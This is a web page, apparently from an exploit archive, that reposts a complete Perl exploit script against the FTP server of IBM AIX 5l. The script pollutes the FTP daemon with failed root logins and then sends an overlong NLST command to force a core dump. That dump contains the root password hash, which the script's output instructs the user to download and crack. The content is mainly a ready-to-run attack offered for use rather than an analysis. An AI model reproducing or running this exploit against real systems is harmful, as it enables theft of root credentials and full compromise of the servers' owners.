Home / os / win7

AIX5l with FTP-Server Remote Root Hash Disclosure Exploit

Posted on 18 July 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>AIX5l with FTP-Server Remote Root Hash Disclosure Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=========================================================
AIX5l with FTP-Server Remote Root Hash Disclosure Exploit
=========================================================

### AIXCOREDUMP.PL ---
### --== ~ AIX5l w/ FTP-SERVER REMOTE ROOT HASH DISCLOSURE EXPLOIT ~ =--
### CREATES COREDUMP INCLUDING THE ROOT USER HASH FROM /etc/security/passwd
### THE RESULT FILE IS SCRAMBLED - SEEK FOR DES LOOKING CRYPTO KEYS
### SUCCESSFULLY TESTED ON IBM AIX 5.1
### DISCOVERED &amp; EXPLOITED BY KINGCOPE
### JULY 2010
 
use IO::Socket;
 
$|=1;
 
print &quot;--== ~ AIX5l w/ FTP-SERVER REMOTE ROOT HASH DISCLOSURE EXPLOIT ~ =--
&quot;;
print &quot;CREATES COREDUMP INCLUDING THE ROOT USER HASH FROM /etc/security/passwd
&quot;;
print &quot;BY KINGCOPE
&quot;;
print &quot;JULY 2010

&quot;;
 
if ($#ARGV &lt; 1) {
    print &quot;USAGE: ./AIXCOREDUMP.PL &lt;target address&gt; &lt;your ip&gt; [username] [password]
&quot;;
    print &quot;SAMPLES:
&quot;;
    print &quot;YOU HAVE A LOGIN ./AIXCOREDUMP.PL 192.168.1.150 192.168.1.25 kcope passwd
&quot;;
    print &quot;USE GUEST ACCOUNT - NEEDS WRITE ACCESS IN /PUB ./AIXCOREDUMP.PL 192.168.1.150 192.168.1.25
&quot;;
    exit;
}
 
$trgt = $ARGV[0];
 
$sock = IO::Socket::INET-&gt;new(PeerAddr =&gt; $trgt,
                              PeerPort =&gt; '21',
                              Proto    =&gt; 'tcp');
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/./,/gi;                              
 
if ($ARGV[2] eq &quot;&quot;) {
    $user = &quot;ftp&quot;; 
    $pass = &quot;c0deb4b3@roothash.com&quot;;
} else {
    $user = $ARGV[2];
    $passwd = $ARGV[3];
}
                         
$x = &lt;$sock&gt;;
print &quot;*AIX EXPLOIT* REMOTE FTPD: $x
&quot;;
if (fork()) {
for ($k=0;$k&lt;3;$k++) {
print &quot;*AIX EXPLOIT* POLLUTING FTPD***
&quot;;
print &quot;	$x&quot;;
print $sock &quot;USER root
&quot;;
$x = &lt;$sock&gt;;
print &quot;	$x&quot;;
print $sock &quot;PASS sexy
&quot;;
$x = &lt;$sock&gt;;
print &quot;	$x&quot;;
}
 
print &quot;*AIX EXPLOIT* ACCESSING FOLDER***
&quot;;
print $sock &quot;USER $user
&quot;;
$x = &lt;$sock&gt;;
print &quot;	$x&quot;;
print $sock &quot;PASS $passwd
&quot;;
$x = &lt;$sock&gt;;
print &quot;	$x&quot;;
 
if ($ARGV[2] eq &quot;&quot;) {
print &quot;*AIX EXPLOIT* CWD TO PUB***
&quot;;
print $sock &quot;CWD pub
&quot;;
$x = &lt;$sock&gt;;
print &quot;	$x&quot;;
}
 
print $sock &quot;PORT $locip,&quot; . int($port / 256) . &quot;,&quot; . int($port % 256) . &quot;
&quot;;
$x = &lt;$sock&gt;;
print &quot;	$x&quot;;
 
print &quot;*AIX EXPLOIT* TRIGGERING COREDUMP***
&quot;;
print $sock &quot;NLST ~&quot; . &quot;A&quot; x 5000 . &quot;
&quot;;
$x = &lt;$sock&gt;;
 
while(&lt;$sock&gt;) {
    print;
}
 
print &quot;*AIX EXPLOIT* (SUCCESS)***
*AIX EXPLOIT* NOW RETRIEVE THE core FILE WITH YOUR FAVOURITE CLIENT AND LOOKUP THE R00T HASH++CRACKIT!***
&quot;;
exit;
} else {
my $servsock = IO::Socket::INET-&gt;new(LocalAddr =&gt; &quot;0.0.0.0&quot;, LocalPort =&gt; $port, Proto =&gt; 'tcp', Listen =&gt; 1);
die &quot;Could not create socket: $!
&quot; unless $servsock;
my $new_sock = $servsock-&gt;accept();
while(&lt;$new_sock&gt;) {
print $_;
}
close($servsock);  
}
## CHEERIO!


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-18]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :